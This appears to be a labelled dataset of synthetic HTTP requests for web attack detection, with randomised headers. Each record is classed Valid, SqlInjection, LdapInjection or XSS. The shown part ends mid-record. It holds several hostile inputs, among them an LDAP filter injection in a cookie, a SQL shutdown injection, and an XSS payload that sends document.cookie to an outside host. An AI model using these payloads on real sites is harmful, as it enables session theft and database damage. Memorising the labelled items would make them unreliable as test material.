Via: 3ghAn6/2.9 209.212.230.33, uan/3.3 174.41.234.185:1
Transfer-Encoding: compress
Upgrade: ysptV/3.4, ratwrs/9.8, Ssil/9.8
Warning: 203 www.rshjafcw.gif:00 "oocSb7oh" 
X-Forwarded-For: 240.197.61.11
X-Serial-Number: 109708230731
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10995
Start - Id: 33646
class: Valid
POST /hrtfnecnxh/omZhJK6suz.htm? HTTP/1.1
Content-Length: 102
Content-Language: whZ,bsnoi,ten
Content-Encoding: identity
Content-Location: /rsys2ac/wseh.rar
Content-MD5: NG1nYWVVZGhsdHNldGxybw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Jun 06 24:54:17 CET
Last-Modified: Wed, 30 Mar 05 16:49:42 UTC
Host: www.hmmym.biz:80
Connection: close
Accept: image/*;q=0.3, image/jpeg;q=0.1, video/*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: 7an-up, tauEen-c5i;q=0.1
Cache-Control: min-fresh=0449
Client-ip: 128.72.56.207
Cookie: iti8aabIspus=k;ferrhyyu=esetduaebautoexecxp_+he
Cookie2: $Version="136"
Date: Fri, 16 Nov 07 06:16:29 UTC
ETag: "vvLw1PZsucRgJpckrD"
Expect: 100-continue
From: diro@y1e50IxI.com
If-Modified-Since: Fri, 27 Jun 08 15:36:31 GMT
If-Unmodified-Since: Wed, 10 Mar 04 21:37:42 GMT
If-Match: *
If-None-Match: "IexvbzzvclFWztjz"
If-Range: *
Max-Forwards: 84
MIME-Version: 8.9
Pragma: a=di
Proxy-Authorization: Basic c242bzp1aHNydHV5
Authorization: NTLM N2U1aW9ndEVjbTczcGVyZ3Nyc0FqOXdmd29kaGR3Ym1zbjB6cm44
Range: 585-81
Referer: /nvdoh/t4acg8.swf
TE: deflate
Trailer: Accept-Language
User-Agent: Mozilla/1.0 (Windows; U; Win 9x 3.8; oT-no; rv:1.0.2) Gecko/56259357
UA-CPU: PowerPC
UA-Disp: 6340,3688,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3257x6651
Via: 4.3 251.171.133.210, FTP/0.8 www.sd5Reid.jpeg:2311, FTP/0.2 216.81.130.83
Transfer-Encoding: identity
Upgrade: s1nn/3.3, bcti/9.0, nar/4.0, ARcl/1.1
Warning: 167 113.207.244.45 "hsttdei" 
X-Forwarded-For: 246.11.40.158
X-Serial-Number: 310133590231890475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

etrDrgY=xY9w3A9&ha=3311&e8=d em&riydtoeoaohs=3&sgemtdb9e=eUY=o &im=e7EraEnortrdm %dh&VHcDpJb1Wr1=3

End - Id: 33646
Start - Id: 34868
class: Valid
PUT /aIfHhSI5wRIaXn8/eKZMjQ5j.eDvTx/ctL/agU/wfE2vCaN.jpeg? HTTP/1.0
Content-Length: 187
Content-Language: xyseomn,d,ueEdX9
Content-Encoding: identity
Content-Location: /eyeuntaa/1ao7gtWs/tyenlt/tavenmnt/itft5.shtml
Content-MD5: cUV0MmFvOTFvb2JpaDh0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Sep 05 23:02:22 UTC
Last-Modified: Fri, 15 Dec 06 07:48:32 UTC
Host: 186.116.25.116
Connection: iwanm
Accept: text/*;q=0.3
Accept-Charset: windows-1253, iso-2022-jp, x-mac-turkish;q=0.3, iso-8859-1, euc-tw
Accept-Encoding: 
Accept-Language: eeiON-t;q=0.6, entf-dmdee, aA5e-e6ye
Cache-Control: no-store
Client-ip: 143.16.148.48
Cookie: neexisgn=ydmrassaE0;asdxrsnnd=265
Cookie2: $Version="457"
Date: Tue, 30 Aug 05 21:41:33 GMT
ETag: W/"GWdSysx8IvCsLPPeu"
Expect: 100-continue
From: ssbalhb@aagj.ch
If-Modified-Since: Wed, 24 Jun 09 12:49:22 CET
If-Unmodified-Since: Thu, 03 Jan 08 03:04:56 UTC
If-Match: *
If-None-Match: *
If-Range: "UtA75cib9fS_.BsvRsA"
Max-Forwards: 011
MIME-Version: 0.8
Pragma: 8='vwbi'
Proxy-Authorization: NTLM a1dwZHVwZW91YWRudGFzczN6dHBBZWJodGVvOWh1b2xocw==
Authorization: Digest uri=http://www.zsgwcd2.de/4kabra/lynnr72s/aswN/eoo4aIm/qaomaez.asmx
Range: -00,9-5046
Referer: /b9tfdne/grblaa.mspx
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: nUeBdonmeaa3sTmbs
UA-CPU: MIPS
UA-Disp: 6897,377,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 084x478
Via: 6.5 185.232.195.233
Transfer-Encoding: Ierag; mc1s=saa1s
Upgrade: prdbih/2.2, bi6b/4.4, hveXe/8.6, oehe5S/1.6, eo8La/9.0
Warning: 197 www.aRtfe.js "nixbwit" "Wed, 24 Sep 08 09:37:18 CET"
X-Forwarded-For: 201.220.221.193
X-Serial-Number: 26564430456596
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nbdOfhjaeteee=eoa&icAl=nq@mO0r&o0ieeni2d=wlL&csoornehb3r=eie9ltn65 &em1Leyusxe=window.openddshutdownvar&eerbalnrhanrni=bj6aLJapsd.&8ahxTf=exqur&ttaASej=eeuSnhiqi@rt@or&rihlharllh=51

End - Id: 34868
Start - Id: 5166
class: Valid
PUT /rttste/drodlsGnso/7OMFKKBXKAeU/nA-/hrf/esLu3D.shtml? HTTP/1.0
Content-Length: 209
Content-Language: ns,mmv
Content-Encoding: gzip
Content-Location: http://www.13RtE4g.ch/ntaa/Te8itIb/tnocsa.mpeg
Content-MD5: cmNhZWVyeW9jbG54bm90bA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Aug 06 11:54:23 CET
Last-Modified: Thu, 18 Sep 08 08:24:11 UTC
Host: 114.44.41.90
Connection: close
Accept: image/jpeg;q=0.9, image/*
Accept-Charset: ks_c_5601-1987;q=0.4, iso-10646-ucs-2;q=0.8, x-mac-hebrew;q=0.3, utf-8
Accept-Encoding: 
Accept-Language: 7-so, 2eo-hHe;q=0.2
Cache-Control: joIoE='v2neWa9'
Client-ip: 73.76.159.247
Cookie: ee=ablpemeejnneri;ohdg=7b;hh=164;ea=437845012
Cookie2: $Version="249"
Date: Mon, 25 Jun 07 20:19:50 UTC
ETag: W/"yyvxIosvhKi7Qigv"
Expect: 100-continue
From: ehsAelee@StuNsq.it
If-Modified-Since: Sat, 08 May 04 05:08:19 UTC
If-Unmodified-Since: Mon, 27 Apr 09 10:55:26 UTC
If-Match: "MZfnnsYzezxrffWjiZC9"
If-None-Match: "wnq2s4bsFZKuvO1"
If-Range: *
Max-Forwards: 097
MIME-Version: 3.5
Pragma: r='lelnhe'
Proxy-Authorization: Digest uri=http://www.cmgaej.gov/eCna/cIiprpee/gnrena/not5ts.swf
Authorization: vhRa uhTS=vEthr
Range: 933-2,0501-
Referer: /LTerid/nZgec.mp3
TE: trailers,deflate;q=0.9,trailers
Trailer: Connection
User-Agent: Mozilla/7.2 (Machintosh; U; PPC Mac OS X 4.3; ei-ge; rv:4.3.0) Gecko/43254502
UA-CPU: x86
UA-Disp: 279,387,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 938x1515
Via: FTP/0.1 www.lEftaet2.shtml, FTP/0.1 116.253.154.114
Transfer-Encoding: identity
Upgrade: snfH3E/4.0
Warning: 340 www.enzW.gif "w3mBIw" 
X-Forwarded-For: 175.0.173.196
X-Serial-Number: 083639126
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hAetovttclne0te=beegrnTsryT2sI1yt&Et=pmobtwe&rxhu=akusni&9sacdtw=%m&rtRc=a333issi&oae4Vgti=6t8ehcu23lSla4&WR.nvhTHG70=32178&eiiahoHe=6@3&dV8=40345&e3=ndrL&Y07JtoacceptaHp= &cQDHJ5HC9kinputZ=uogae7bde0noXun

End - Id: 5166
Start - Id: 10056
class: Valid
GET /ds3hs9su.swf?fUZfG4=0402&21faemttoaUt=1&wibtJhtjfrwo=746792&ellpmr=n%7Et&Pay1ytdfb4n=uAu&tplm5s=9277898&xtvosarejtreo=eY_j2teeDP&LI0miilorw=5186&hhalen5copp2n=132149&HevvarpAk_y=4084932 HTTP/1.0
Host: 113.75.81.4:6952
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: o4s-t;q=0.0, dyceGhi-cuoXL;q=0.6, ns-iSpna, Iaigrya-wgNt;q=0.5
Cache-Control: min-fresh=11842
Client-ip: 173.27.110.139
Cookie: lJGwhereJ9JXKcS6=nd4i]bgur
Cookie2: $Version="6"
Date: Thu, 03 Mar 05 19:36:38 UTC
ETag: W/"kylE19E.mtLBkyngQP8"
Expect: hedstDad
From: aemYeste@u736nnw.biz
If-Modified-Since: Tue, 23 May 06 19:09:19 GMT
If-Unmodified-Since: Tue, 28 Oct 08 21:08:47 UTC
If-Match: *
If-None-Match: "JAIw1RxdDvc5c3I"
If-Range: *
Max-Forwards: 10
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest nc=7042F6FA
Authorization: Basic azEzaWg6c1lmNXg=
Range: 312215-014657
Referer: http://www.eaieee.net/umSiimsm.cgi
TE: trailers,chunked;q=0.1
Trailer: Cache-Control
User-Agent: 2yKSYcsB-4 http://www.IvtAhe.be
UA-CPU: PowerPC
UA-Disp: 3720,8490,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1796x089
Via: 3.4 www.7ohe8.shtml, 6.1 132.55.165.141
Transfer-Encoding: identity
Upgrade: odhn/5.9, rOmU/0.6, etCeis/4.4, iottop/5.2, scqrL/2.8
Warning: 334 201.54.73.174:7 "ostm1" 
X-Forwarded-For: 156.117.248.41
X-Serial-Number: 905480693565962672
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10056
Start - Id: 24655
class: Valid
GET /yiGRshutdownmD/ofdnieTeuenyNuxrw/iDHPR/etL9aitendhl0ecmKei/orbhuP6qybFgXJ6jEK_/Noebeaetaiixi/oerglar2vgirqeucarm/wEiV42kKySMo/cj-UbAb5Hty/aureqynl/CTB4ETSI@k-A1jP.msf?tnrIosnoes=tnNcw&ppid4us4=klf6mOemrUnps&ntxrhp=18z6hu2BIN&AY8connectzfy=51072&ajustem6hYrNot=54240&MXJ5Ub.=36764479&Tjisbnoauos=siP%40&ertAoturdYhih=gsjLo&wnEtelnetvmaillinkgY=bP-&zolIprw1seiu=nBd&tEE5itcyhutm=1609818&ikon=iaqCpz_y HTTP/1.1
Host: www.oolR5d9en.cz
Connection: iiIie
Accept: image/png;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: knw-e0R;q=0.1, i-s;q=0.3
Cache-Control: only-if-cached
Client-ip: 0.253.144.213
Cookie: sytEtbuoeas=afs 3caiel;eym8tert=11671;nt2=vuHuo;eeeiyrbouGa=87491012
Cookie2: $Version="83"
Date: Wed, 22 Feb 06 19:52:38 UTC
ETag: "i.7Yq1YoQK.eJPxQ_v"
Expect: 100-continue
From: dtiJev@chlmiutOj.fr
If-Modified-Since: Fri, 16 Apr 10 17:29:26 GMT
If-Unmodified-Since: Tue, 13 Mar 07 18:05:50 CET
If-Match: *
If-None-Match: "Rb49Ig_wj9bEngNLO"
If-Range: *
Max-Forwards: 8390
MIME-Version: 3.5
Pragma: Ls='b94eewr'
Proxy-Authorization: Asws oa5d=buerH
Authorization: Digest uri=http://www.gathnS.gov/ai2dt/ea6nOib/seGe/jiiaept.css
Range: 8-2383
Referer: /IReail/3lid.cfm
TE: gzip;q=0.0
Trailer: If-Modified-Since
User-Agent: stVTyi http://www.eaih.fr
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1205x8135
Via: 2.6 165.228.149.61, HTTP/7.4 239.176.255.226
Transfer-Encoding: gzip
Upgrade: erm/1.1, qamkie/3.0, 4Eloit/4.3, e8iif/6.9
Warning: 630 240.228.130.93 "ldhdroewpruS9hem" 
X-Forwarded-For: 97.48.167.87
X-Serial-Number: 56029803010715
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24655
Start - Id: 37476
class: LdapInjection
GET /groe/c2tRegeehllcnbhietea/cntoU3/jEmi2X9T3includeorea/tF-NF8Te4jjg7qK49USi/97P@EYDtI/uhUU1eZaW1v0I/YEQreplace0T2X8dsystem/T2ctat6t/2OvqwRv2-Ws9t/nwvLRzDaYs8Aqn.asmx?tet1ccs3bsosCvN=crs%3Bapasswdr&pnaeni6u1H=t&hzBXc=1378&todgfrdr6h=qg0skNxp&Iercdtidqahn5=7031&bwiod=p6hE&og8=ooea&ogR=izGjZzloQjFN&mEnjakta=t8x&GtelnetI5HaC0b@=02740&-P@peqXzrWSo=Crm%3Acqhttpyscsgeb&aentd=43&mEbseDsiaih=%2Bx5de HTTP/1.1
Host: www.etotjdo.net
Connection: eLsf
Accept: application/*;q=0.1, application/*
Accept-Charset: iso-8859-7, x-mac-ce, iso-8859-15;q=0.7, iso-8859-15;q=0.0, big5
Accept-Encoding: compress, gzip;q=0.5, deflate, identity;q=0.9, compress;q=0.9
Accept-Language: ue-ent0gs;q=0.4, n-eioor;q=0.0, odaesPs-E;q=0.9, cyig-eoa3R6l
Cache-Control: no-store
Cookie: ehtlgoernryh=")(targetfilter=(o=NetscapeRoot))
Cookie2: $Version="465"
Date: Thu, 21 Apr 05 22:32:46 CET
ETag: "F40ZP5Gqd7KFnZ8x@NSU"
If-Modified-Since: Thu, 12 Nov 09 23:14:54 GMT
If-Unmodified-Since: Sat, 23 Jan 10 12:29:48 CET
If-Match: *
If-None-Match: *
Max-Forwards: 4
MIME-Version: 5.3
Pragma: no-cache
Authorization: Basic b2V0bTp1amVpaQ==
Referer: /Trpe/8bpr3u.jpg
TE: chunked;q=0.7,trailers,trailers
Trailer: Upgrade
User-Agent: EqligwifAotopos8Wh
UA-OS: Windows 95
UA-Color: color16
Via: HTTP/0.3 194.114.90.93, 3.1 www.Mleikjh.shtml, 3.5 www.n7gNebew.css
Transfer-Encoding: compress
Warning: 456 63.248.211.211 "dhhovt8o1H7" "Thu, 11 May 06 01:33:00 UTC"
X-Forwarded-For: 162.194.198.203
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37476
Start - Id: 35201
class: SqlInjection
GET /6Mj/httpJpUh/%ubQyGa/oh-2j.16OB9P6X/oSnat/eGFhsock_streamsock_streamP.985deletewunionB/kPXeg5fOx/a7jpNTY@1ie9Lx9j/ronLi3chsjslurReAgNh/hQNrSTo2nL2Rs4p3Aurz.js?caqcnhylwrcf=71334&oJelisdeorr=qta&-@yqpnW=snhescitterHlcrnr&JXHOiudBuDr=358701804&7JkB7documentL6sps=vscineas40ek&heynte=xnr7tcdhteht2t&3id5=aoaeEhreiRoeloOuto&feyedveaEtsrlh=6434229&pe=i%2FGelmm%3D&nusrl9=e9lehewwajttm&rda2e9uten=imgboot.iniaptwinnty%400&w5Jisxtssen=%27%3B+++++shutdown--&fHczzDy_cU=%2Be+&bu68xn@IEnull=hmocha&0wr=22bko9yHT28L HTTP/1.1
Host: www.Ns7L.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: uswt-suiaWoad;q=0.1, Unm-ha8a;q=0.2, i1rslmq-heobfaEn;q=0.9
Cache-Control: Hbtw=Llf2t4m
Client-ip: 78.116.124.236
Cookie: qjPdocument=otail;rnnt=smaqise
Cookie2: $Version="991"
Date: Sun, 29 Apr 07 04:38:48 GMT
ETag: "oJj9dXVOzYu6K3_qCx"
Expect: 100-continue
From: os33et6k@EniiktZna.uk
If-Modified-Since: Sun, 26 Oct 08 12:56:38 UTC
If-Unmodified-Since: Sun, 15 May 05 21:00:49 CET
If-Match: "Km7KKJO3GBaAtLOqHxU"
If-None-Match: *
If-Range: Fri, 04 Jan 08 08:25:06 CET
Max-Forwards: 968
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: 9trc 8rehoi=lhgsh5
Authorization: lnie e8dsIrte=ositt
Range: 786796-,-020
Referer: http://ofEata4.it/u5To0f0e/ntdreoJ/earec/sb3ipT3.php4
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: E68f (cmDeqM@S9; ikmk57Q8; ur@yCbQ)
UA-CPU: Sparc
UA-Disp: 601,1500,16
UA-Color: color32
UA-Pixels: 0990x1742
Via: 3.9 89.35.210.150
Transfer-Encoding: identity
Upgrade: Iivqh/4.1, nEStsn/0.1, ocna/1.5, bea/5.8, n7i/2.7
Warning: 562 145.202.157.174 "Eninnaeeoatl9O4t" "Mon, 02 Feb 04 01:35:42 GMT"
X-Forwarded-For: 74.88.12.154
X-Serial-Number: 653794992925901
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35201
Start - Id: 47321
class: XSS
GET /rocctayreopeadtshoti/mp5mJuUkunYNN/p4jtiyapc/rtcEstrecucssTi/PVZEWiQQo2SToAb/obEelh2obrndA/UWC6Z6AUoHP_XKI/GoptB9phpIJ6w.htm?TWWJ4zH_=rL6&ey=aoa6%7Ecert0re&ch=dqQK8&ZoX1jI=bGkn67%40E-Nd&egnVentlSner7=mgh6document&uitbsd8eise=0&rk3foyasSitodet=nv5&ntgeads4cr4muma=6GGwtk64iaVW&rEmehnrea7=ae3ns&apsad=%3Cinput+++type+++%3D++++%22+++++image+++%22+++++dynsrc++%3D+%22+++++javascript%3A++++%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.ta.com%2Fcgi-bin%2Fnssila.cgi%27%2Bdocument.cookie%29%3B%5D+++%22++%3E&Bltha=dwDLx16&oG3b-vXjXGgV=imeta&KdreeioG9sm=pviHtKW&ewpeoemhR0sh=lDrh4t6Inanc HTTP/1.1
Host: 134.229.175.4
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 188.124.236.19
Cookie: etroTrrE6=dt;ptibnoeotrsaeal=2147;tnsgFwcnieenc=fents
Cookie2: $Version="508"
Date: Tue, 25 Sep 07 03:37:35 GMT
ETag: W/"@-3igXFzz.XbYHw@rM"
Expect: 100-continue
From: fvc2@eesg.net
If-Modified-Since: Thu, 26 Feb 09 07:36:01 GMT
If-Unmodified-Since: Sun, 06 Aug 06 13:47:18 UTC
If-Match: "@H@xtGbtGY_C7PrO"
If-None-Match: *
If-Range: Sat, 26 Aug 06 16:00:00 UTC
Max-Forwards: 45
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Digest uri=http://www.kiaenw3.st/ehjeCct/ffEvEde/rm4i/ymaoit/rasiham.cgi
Range: -827060,69-,229-399617
Referer: http://www.lh3i.net/esid/we7iYc/oroesidf/eLdlr/Asamoadn.avi
TE: chunked;q=0.5
Trailer: If-Match
User-Agent: Mozilla/6.2 (Windows; U; WinNT 2.1; fe-j0; rv:7.2.7) Gecko/66171720
UA-CPU: Sparc
UA-Disp: 6722,405,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5306x1733
Via: 9.1 www.6zts.jpg, kl6eeo/5.0 www.igaensu.jpg, ttlasm/7.8 129.171.210.3
Transfer-Encoding: identity
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 151.1.251.143
X-Serial-Number: 126620
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 47321
Start - Id: 1296
class: Valid
GET /xBvarwgetQ6rcpq97htaccestdAA/ointBiscr4/tNtzeaooeahir/nhRPpazniu/cgilrhYs/n7Ub@7ZaEVVn7PTdT/cJ-CeERP0rSsV-.shtml?NOh.rsock_streamHS3P=drop%5DJbodyino%27%3Cectiuea HTTP/1.1
Host: 141.226.115.7
Connection: close
Accept: */*;q=0.9
Accept-Charset: koi8;q=0.4, big5;q=0.7, windows-1257;q=0.5, iso-8859-3
Accept-Encoding: gzip, gzip;q=0.2, compress, gzip;q=0.4, compress;q=0.3
Accept-Language: reBr-Iarja, 3a-alhHhe;q=0.3, e-nl
Cache-Control: max-age=8163
Client-ip: 169.155.248.146
Cookie: lsEelpcgrnznj=tIm-PgT5nY
Cookie2: $Version="02"
Date: Sat, 31 Dec 05 14:57:55 GMT
ETag: "jN1cpNq1eDp@-K6iMau"
Expect: hek4snqi
From: o2yoIi@nrSybWihss.biz
If-Modified-Since: Wed, 11 Apr 07 16:08:48 GMT
If-Unmodified-Since: Sat, 10 May 08 18:11:02 GMT
If-Match: "GcwMxxuTxZTcOfE"
If-None-Match: "lfkssJnniLmQEeoau1"
If-Range: *
Max-Forwards: 9009
MIME-Version: 7.7
Pragma: i='a2'
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: NTLM YWl0ZWl0eGJoZnpSbmhlYXJwcm10b2ltbGVubjlLcnJlcXhvb2xBYXVlMmlZYWU1
Range: 282-,2-77614,032140-
Referer: /Ihey5m.php3
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/6.5 (Machintosh; U; PPC Mac OS X 4.3; t3-ea; rv:3.2.7) Gecko/70340463
UA-CPU: PowerPC
UA-Disp: 893,913,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7486x696
Via: 2.0 64.206.153.117
Transfer-Encoding: I3e16; oi0it=tnl1e
Upgrade: mtc/2.4, 2tb/3.3, uMmd0b/9.5, oua/7.8, sdtbe/1.8
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 67843918306515180
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1296
Start - Id: 8905
class: Valid
GET /yXnEji9yTsoXg8ad_x/9_ue_/7hocibosnodQYtidsV/909XrOY9qi.q7imbdN/eyFAaer9/LRoEheahe/_having6hKysq0U5N/a-yI0Cx/iar/E1e-b9/x4srlsttruanntUzOh.jsp?7oaayntma=abin1ri&qce=M&hafbnd=o9au&nhodilannapejio=spuNfxo&baglGy=sock_stream%240unionltsdzr&ezsdobr=1criAboot.initrtse&nlm=15&UFfxmlconnectLK=849373617 HTTP/1.1
Host: 198.173.92.197
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic, x-mac-japanese, iso-8859-2;q=0.5, windows-1255;q=0.8, cp-936
Accept-Encoding: deflate;q=0.2
Accept-Language: aaSdcera-le, viPhqN-3E
Cache-Control: ewqmd='hUdofLi'
Client-ip: 178.118.114.226
Cookie: 6ZN9tEfjhwn=eoptvbscripteu;asiennftg=6f >gumyd~sle? n;hisi=82
Cookie2: $Version="266"
Date: Sat, 07 Feb 09 19:48:20 CET
ETag: "o_YERB0dpVOt2YXC"
Expect: 100-continue
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Mon, 12 Mar 07 01:15:35 GMT
If-Unmodified-Since: Tue, 04 Jul 06 07:47:25 CET
If-Match: *
If-None-Match: "J41NEoiNYYC_GZ7b"
If-Range: Sun, 14 Jan 07 15:00:50 GMT
Max-Forwards: 8
MIME-Version: 7.9
Pragma: epd=ycltEys
Proxy-Authorization: NTLM ZGVuZDRtZ2hyY3Jub29ld3RhZWZoZnBrc0E5T2NNZWVtcGlheGdIbEllUm1la2Rn
Authorization: nadne hanc8oO=t0e1m
Range: 195341-892,301-417,85-
Referer: http://gOi5v5o.uk/o7koitr/drrhjii/dtjh.bin
TE: chunked;q=0.4,trailers,trailers
Trailer: Trailer
User-Agent: ssayDesmvi
UA-CPU: x86
UA-Disp: 012,690,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 000x5970
Via: HTTP/8.3 145.159.52.95
Transfer-Encoding: deflate
Upgrade: ne7b/6.5
Warning: 504 www.w3oroz9y.htm "acttofeQ52Va9c" 
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 266699
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8905
Start - Id: 26559
class: Valid
GET /gD7WP_/iM3.gif?imis8taQ=ucqhxreehhha&cg3hcuRCa=tmy&lA6hlmuna7gsxog=naia&e3hqn=Thbin HTTP/1.1
Host: 209.204.39.58:80
Connection: close
Accept: video/*;q=0.5, application/postscript;q=0.1, audio/x-wav
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.5, identity, compress;q=0.5
Accept-Language: e-oA7hwb;q=0.2
Cache-Control: no-transform
Client-ip: 85.123.42.238
Cookie: eicNtri=arrl@Y1yg
Cookie2: $Version="44"
Date: Tue, 08 Dec 09 03:09:37 CET
ETag: "me7Bfm5tZUSOpsA"
Expect: 100-continue
From: s0gh3e@iassgmaldn.be
If-Modified-Since: Sun, 19 Dec 04 12:38:21 GMT
If-Unmodified-Since: Thu, 21 Jan 10 04:30:17 CET
If-Match: "mKyN2e5BydWd1_xX"
If-None-Match: *
If-Range: Thu, 18 Sep 08 21:33:11 CET
Max-Forwards: 73
MIME-Version: 5.3
Pragma: et=0aazrm
Proxy-Authorization: Basic Y2VDNnZraW86NmFyYWc5aQ==
Authorization: liel btheh6=gllp3agt
Range: 9769-87960,68614-
Referer: http://meunEa.uk/ieoarpy/dorAxc/atinE/etdoxdi.asmx
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/5.8 (X11; U; Open BSD i586 0.7; rt-6m; rv:2.8.9) Gecko/04939048
UA-CPU: Sparc
UA-Disp: 0886,5567,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0753x702
Via: yFh/2.2 www.g1r1rbr.css
Transfer-Encoding: identity
Upgrade: itrxt/3.8, zdmh/3.6, Tmtet/5.7, 8t6vuj/5.9
Warning: 441 www.aram.shtml "aigi2urFwunlumclaef" "Fri, 26 Aug 05 10:11:16 CET"
X-Forwarded-For: 223.165.230.236
X-Serial-Number: 693373977262
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26559
Start - Id: 13922
class: Valid
GET /oor/tYQFGEqGPvs3qiVF0i3/hcsWwB_SvPcv4/lBLzcO.swf?apeJsnadc=sdr7olnwin6s&in0atenerhl=oyczin&ine2sw=au3rqlirokL&lbody3group by.A6tmpPX=rtwee&a2qo5=70616&bodeesioTor=%3Boaexec&efg=t9%3Eo%277%3C&loeetELFt=e&naos=46279956 HTTP/1.0
Host: www.mnfr8.de:3
Connection: keep-alive
Accept: image/*;q=0.3, video/*, audio/*
Accept-Charset: x-mac-greek, x-mac-greek;q=0.4
Accept-Encoding: 
Accept-Language: epn-he, eAe3too-opesnla
Cache-Control: tetzs='nfprsa'
Client-ip: 179.61.107.5
Cookie: Mr0_0MUsF.=21;thgiEeptirluT=9397942;ttnnro60lenf8nz=niahenpetiS
Cookie2: $Version="2"
Date: Sun, 04 Apr 10 03:13:12 GMT
ETag: "6Wsvh5DqVLYnPwZ9mGh."
Expect: 100-continue
From: mshmtny@eieiosii.fr
If-Modified-Since: Sat, 12 Jun 04 14:29:00 GMT
If-Unmodified-Since: Tue, 21 Aug 07 17:49:30 UTC
If-Match: "eYnPHNoE5lstyp5y"
If-None-Match: "oX2en8qxKmOQRVycM6F"
If-Range: *
Max-Forwards: 6043
MIME-Version: 0.9
Pragma: b=r
Proxy-Authorization: 6AOdei e7th1an=dmthExvp
Authorization: Digest response="a85B565dE0b0BA6cCf421F380F4E9716"
Range: 868-9,0-
Referer: /isvEexd/0dMt/erfleli/soedmtc.html
TE: trailers
Trailer: User-Agent
User-Agent: l1ucutotts (nYPUhdl; nPqi9cLTm; aSN@403eg; tSXdtD; w8YbgL)
UA-CPU: MIPS
UA-Disp: 215,5211,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5557x706
Via: 9.5 17.202.131.199
Transfer-Encoding: compress
Upgrade: cai/2.6, gufR/8.6, trrhf/5.6
Warning: 383 www.ueaiuSji.js:995 "arheybgekoaoT" "Thu, 12 Feb 09 08:30:25 UTC"
X-Forwarded-For: 144.135.40.157
X-Serial-Number: 023229886351818841
----: --------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 13922
Start - Id: 32819
class: Valid
POST /XE7BjgXSastfv/saddieec/ubep/euoeIree4rhuhd7sett/ue0/oiuatxaeruasass/d-PWpa6/e4sycrEpaygtp.dll? HTTP/1.1
Content-Length: 199
Content-Language: rnlpoeh,eNl
Content-Encoding: deflate
Content-Location: http://c5buei.be/nEiM/sotR30S/os5turaa/noDirhke/7arl.ace
Content-MD5: MGloYW1BbW80cm9ubmV0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 21 Sep 07 23:22:17 GMT
Last-Modified: Tue, 24 Feb 04 11:40:44 GMT
Host: www.aoh0fo.uk:80
Connection: or1fg
Accept: text/*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: hrbe-ios, Codevl-h
Cache-Control: no-transform
Client-ip: 238.106.183.32
Cookie: saeexsduSmadPo=eUKh
Cookie2: $Version="8"
Date: Sat, 11 Feb 06 13:56:25 GMT
ETag: W/".QtxPGE4lSx8Y-LsbHM"
Expect: nArhhaaI=snlrmioc
